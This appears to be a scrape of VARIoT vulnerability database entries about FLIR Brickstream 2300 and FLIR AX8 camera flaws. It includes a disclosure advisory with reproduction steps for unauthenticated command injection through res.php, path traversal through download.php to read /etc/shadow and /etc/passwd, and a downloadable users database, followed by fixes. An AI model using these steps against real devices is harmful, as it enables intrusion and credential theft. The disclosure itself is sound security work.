            "id": "JVNDB-2018-001266"
          },
          {
            "date": "2018-01-17T18:15:37.540000",
            "db": "NVD",
            "id": "CVE-2018-3813"
          },
          {
            "date": "2018-01-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201801-002"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201801-002"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "FLIR Brickstream 2300 Information disclosure vulnerability in devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001266"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "information disclosure",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201801-002"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201806-1134

    Vulnerability from variot - Updated: 2023-12-18 13:02

    Brickstream 2300 devices allow remote attackers to obtain potentially sensitive information via a direct request for the basic.html#ipsettings or basic.html#datadelivery URI. Brickstream 2300 The device contains an information disclosure vulnerability.Information may be obtained. Brickstream2300devices is a traffic statistics and analysis sensor device. A security vulnerability exists in the Brickstream 2300 device

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201806-1134",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "brickstream 2300",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "flir",
            "version": null
          },
          {
            "model": "brickstream 2300",
            "scope": null,
            "trust": 0.8,
            "vendor": "flir",
            "version": null
          },
          {
            "model": "devices",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "brickstream",
            "version": "2300"
          },
          {
            "model": "2300",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "brickstream",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-12420"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-007552"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12920"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201806-1411"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:flir:brickstream_2300_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:flir:brickstream_2300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-12920"
          }
        ]
      },
      "cve": "CVE-2018-12920",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.0,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2018-12920",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-12420",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-122928",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 7.5,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2018-12920",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2018-12920",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-12420",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201806-1411",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-122928",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-12420"
          },
          {
            "db": "VULHUB",
            "id": "VHN-122928"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-007552"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12920"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201806-1411"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Brickstream 2300 devices allow remote attackers to obtain potentially sensitive information via a direct request for the basic.html#ipsettings or basic.html#datadelivery URI. Brickstream 2300 The device contains an information disclosure vulnerability.Information may be obtained. Brickstream2300devices is a traffic statistics and analysis sensor device. A security vulnerability exists in the Brickstream 2300 device",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-12920"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-007552"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-12420"
          },
          {
            "db": "VULHUB",
            "id": "VHN-122928"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-12920",
            "trust": 3.1
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-97370",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-007552",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201806-1411",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-12420",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-122928",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-12420"
          },
          {
            "db": "VULHUB",
            "id": "VHN-122928"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-007552"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12920"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201806-1411"
          }
        ]
      },
      "id": "VAR-201806-1134",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-12420"
          },
          {
            "db": "VULHUB",
            "id": "VHN-122928"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-12420"
          }
        ]
      },
      "last_update_date": "2023-12-18T13:02:38.087000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.brickstream.com/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-007552"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-200",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-122928"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-007552"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12920"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.seebug.org/vuldb/ssvid-97370"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12920"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-12920"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-12420"
          },
          {
            "db": "VULHUB",
            "id": "VHN-122928"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-007552"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12920"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201806-1411"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-12420"
          },
          {
            "db": "VULHUB",
            "id": "VHN-122928"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-007552"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12920"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201806-1411"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-07-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-12420"
          },
          {
            "date": "2018-06-28T00:00:00",
            "db": "VULHUB",
            "id": "VHN-122928"
          },
          {
            "date": "2018-09-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-007552"
          },
          {
            "date": "2018-06-28T11:29:00.210000",
            "db": "NVD",
            "id": "CVE-2018-12920"
          },
          {
            "date": "2018-06-29T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201806-1411"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-07-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-12420"
          },
          {
            "date": "2018-08-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-122928"
          },
          {
            "date": "2018-09-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-007552"
          },
          {
            "date": "2021-05-03T17:45:15.117000",
            "db": "NVD",
            "id": "CVE-2018-12920"
          },
          {
            "date": "2021-05-06T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201806-1411"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201806-1411"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Brickstream 2300 Information disclosure vulnerability in devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-007552"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "information disclosure",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201806-1411"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202208-1429

    Vulnerability from variot - Updated: 2023-12-18 11:55

    All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this by sending a URI that contains the path of the SQLite users database and download it. A successful exploit could allow the attacker to extract usernames and hashed passwords. FLIR Systems, Inc. of flir ax8 Firmware has a lack of authentication vulnerability for critical functionality.Information may be obtained. # FLIR AX8 vulnerabilities.

    Product description:

    The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.

    Summary of the 4 vulnerabilities found / What we were able to find:

    • [CVE-2022-37061] - Unauthenticated OS Command Injection.

    FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in res.php endpoint.

    • [CVE-2022-37060] - Unauthenticated Directory Traversal.

    • [CVE-2022-37062] - Improper Access Control.

    • [CVE-2022-37063] - Reflected cross-site scripting.

    FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface.

    Step by Step Example (How to Reproduce and verify) the vulnerabilities:

    1. Unauthenticated Remote Command Injection.

    The endpoint /res.php can be called remotely without user authentication as there is no cookie verification Cookie: PHPSESSID=ID to check if the request is legitimate. The second problem is that the POST parameter id can be injected to execute any Linux command. In the example below we create a crafted query that displays the contents of the /etc/shadow file.

    The server returns a JSON response containing the contents of the /etc/shadow file. This command injection is due because there no sanitization check on the variable $_POST["id"], line 65, and can therefore take advantage of the shell_exec() function to execute unexpected arbitrary shell commands.

    1. Unauthenticated Directory Traversal.

    The endpoint /download.php can be called remotely without user authentication as there is no cookie verification Cookie: PHPSESSID=ID to check if the request is legitimate. The second problem is that the GET parameter file can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the /etc/passwd file.

    The error is due to the fact that there is no sanitization of the $file_path variable, line 26, when the fopen() function is called, line 39. However a comment in the code, line 24, and the use of the function pathinfo(), line 28, suggests that the developer thought about this problem and therefore created the variable $path_parts which is sanitized. But for some reasons the developer does not use the sanitizer variable $path_parts when the function fopen() is used. Probably an oversight.

    1. Improper Access Control.

    The endpoint /FLIR/db/users.db can be called remotely without user authentication as there is no cookie verification Cookie: PHPSESSID=ID to check if the request is legitimate and let any malicious actor to download the users.db SQLite database.

    1. Reflected cross-site scripting.

    In the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call

    .run

    Recommendations for how to fix the 4 vulnerabilities:

    • Vulnerability 1: The variable $_POST["id"], line 65 in the file /FLIR/usr/www/res.php, must be sanitized using the function intval() and will remove any character other than integer value. escapeshellcmd() and escapeshellarg() must be also used to escapes any characters in a string that might be used to execute arbitrary commands.

    More info: https://www.php.net/intval https://www.php.net/manual/en/function.escapeshellcmd https://www.php.net/manual/en/function.escapeshellarg

    • Vulnerability 2: The variable $file_path, line 39 in the file /FLIR/usr/www/download.php, must be sanitized using the function pathinfo() but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions.

    More info: https://www.php.net/manual/en/function.pathinfo

    • Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in /etc/lighttpd.conf.

    More info: https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html

    • Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters.

    More info: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

    Reference:

    https://www.flir.com/products/ax8-automation/

    Security researchers:

    • [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen)
    • [Samy Younsi] (https://www.linkedin.com/in/samy-younsi)

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202208-1429",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ax8",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "flir",
            "version": "1.46.16"
          },
          {
            "model": "ax8",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "flir",
            "version": null
          },
          {
            "model": "ax8",
            "scope": null,
            "trust": 0.8,
            "vendor": "flir",
            "version": null
          },
          {
            "model": "ax8",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "flir",
            "version": "flir ax8  firmware  1.46.16  and earlier"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014924"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37062"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:flir:flir_ax8_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.46.16",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:flir:flir_ax8:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-37062"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Samy Younsi",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3377"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2022-37062",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 7.5,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-37062",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2022-37062",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202208-3377",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014924"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37062"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3377"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this by sending a URI that contains the path of the SQLite users database and download it. A successful exploit could allow the attacker to extract usernames and hashed passwords. FLIR Systems, Inc. of flir ax8 Firmware has a lack of authentication vulnerability for critical functionality.Information may be obtained. # FLIR AX8 vulnerabilities. \n\n### Product description:\n\nThe FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment. \n\n\n### Summary of the 4 vulnerabilities found / What we were able to find:\n\n* [CVE-2022-37061] - Unauthenticated OS Command Injection. \n\nFLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter in `res.php` endpoint. \n\n* [CVE-2022-37060] - Unauthenticated Directory Traversal. \n\n* [CVE-2022-37062] - Improper Access Control. \n\n* [CVE-2022-37063] - Reflected cross-site scripting. \n\nFLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to 